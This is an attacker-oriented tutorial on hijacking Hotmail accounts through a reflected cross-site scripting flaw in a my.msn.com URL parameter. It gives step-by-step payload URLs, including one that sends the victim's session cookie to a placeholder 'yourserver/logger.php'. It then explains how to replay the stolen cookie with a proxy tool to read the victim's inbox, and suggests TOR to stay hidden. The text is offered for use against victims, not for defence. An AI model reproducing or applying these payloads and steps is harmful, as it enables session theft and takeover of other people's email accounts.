Hacking Hotmail through
XSS
Introduction
Microsoft's code is not always secure. This is very clear, once again, with
this XSS exploit. This is not the first XSS exploit that has been found, others
before it can attest it.
How
The idea is simple. When you are logged-in into Hotmail, a cookie is created
which allows you access every time you are in it's domain. Since the cookie is
not IP-bound (how is this possible? - Microsoft) we are able to fake the
cookie. Once stolen, we are able to use it to login.
What this all means is that we do not need to know the password or even the
email address of the victim. Through XSS we can insert a piece of javascript
code that will send the cookie to a webserver with a log script. This can be
written in PHP, ASP, CGI - practically any language you want. The cookie can be
faked with Proxomitron.
Where
Finding an exploitable webpage is like being 50% based on pure luck. Or you
have a really awful amount of time to spend. There is software that is written
for auto-searching XSS exploits. Dont use it - it's crap, clear thinking is
enough.
When searching, keep these points in mind:
1. The page where you are searching for must be in the domain, which is
specified in the cookie. On the pages with 'Logout' buttons in Hotmail, you are
using that cookie. I would recommend you adding some bookmark displaying your
cookie, like javascript:alert(document.cookie); .
2. You can use practically any browser, though i'd recommend Mozilla Firefox.
It is stable, secure, and available on almost any OS. Opera or Internet
Explorer are ok to use as well, if you like them better. One good benefit of
using Opera is that it lets you manage your own cookies.
3. If you want to be stealthy use TOR or a proxy. You should be aware though
that DNS Leaking is still dangerous
In my search it took me 4 to 5 hours to find three exploits. I will discuss one
only.
After having a short look at the cookie, I decided to just start the search.
Except for your security, no other preparations are needed. Focus yourself on
URL's with GET variables - they are often vulnerable. And, when you opened up a
new page, check if your cookie is still equal to Hotmail's login page cookie.
Start replacing a GET-variable in the url one by one. Reload the page and view
the page source. Check in the source if there are also images or URL's which
also contain GET variables, you might be able to exploit these. Is your
replaced variable there, try to make it in a way that it ends valid
html/javascript and can display an error for you. Often special characters are
escaped. A nice all-around variable is something like hya"'><)(ho .
Exploit
The normal URL:
http://my.msn.com/newmodule.armx?tok=TVJmHF%2bsBJ5RdVvt67SjWQ%3d%3d&page=1& m=&col=1&tab=3
The test URL:
http://my.msn.com/newmodule.armx?tok=TVJmHF%2bsBJ5RdVvt67SjWQ%3d%3d&page=1&m= hya"'><ho&col=1&tab=3
A ctrl+f in the source for hya gave the invalid input:
<input type="hidden" name="m" value="hya"><ho" />
To alert the cookie, it needs to be like this. Fortunately special characters
were not escaped:
<input type="hidden" name="m" value="hya"><script>alert(document.cookie)</script><br class="ho" />
The exploited URL:
http://my.msn.com/newmodule.armx?tok=TVJmHF%2bsBJ5RdVvt67SjWQ%3d%3d&page=1&m=
hya"><script>alert(document.cookie)</script><br class="ho&col=1&tab=3
Finish
I assume you have the knowledge to at least figure things out yourself, so I am
not going to much in details. In the last examples the cookie was alerted by
javascript. We need the cookie to be send to a webserver, and there it needs to
be logged. I assume you know how to create a logging file. Replace my code by
your file where needed.
This is the edited URL so it sends the cookie to an webserver.
http://my.msn.com/newmodule.armx?tok=TVJmHF%2bsBJ5RdVvt67SjWQ%3d%3d&page=1&m=
hya"><script>location.href='http://yourserver/logger.php?cookie= '%2Bescape(document.cookie)</script><br
class="ho&col=1&tab=3
This is the link the victim should click. As soon as he clicks it, his cookie
is being sent to your server, resulting to be saved in your logfile. You can display
some innocent error or redirect to an other page.
Next, get Proxomitron. Configure your browser to use it. Fire up proxomitron,
go to headers, and fill in the cookie data from your logfile into a fake cookie
header (there is one by default). Make sure you have checked the 'out' box. Go
to http://my.msn.com/.
The inbox of your victim is all yours. If this does not work immediately, a
cookie is not made yet. Just go to http://my.msn.com/ again.
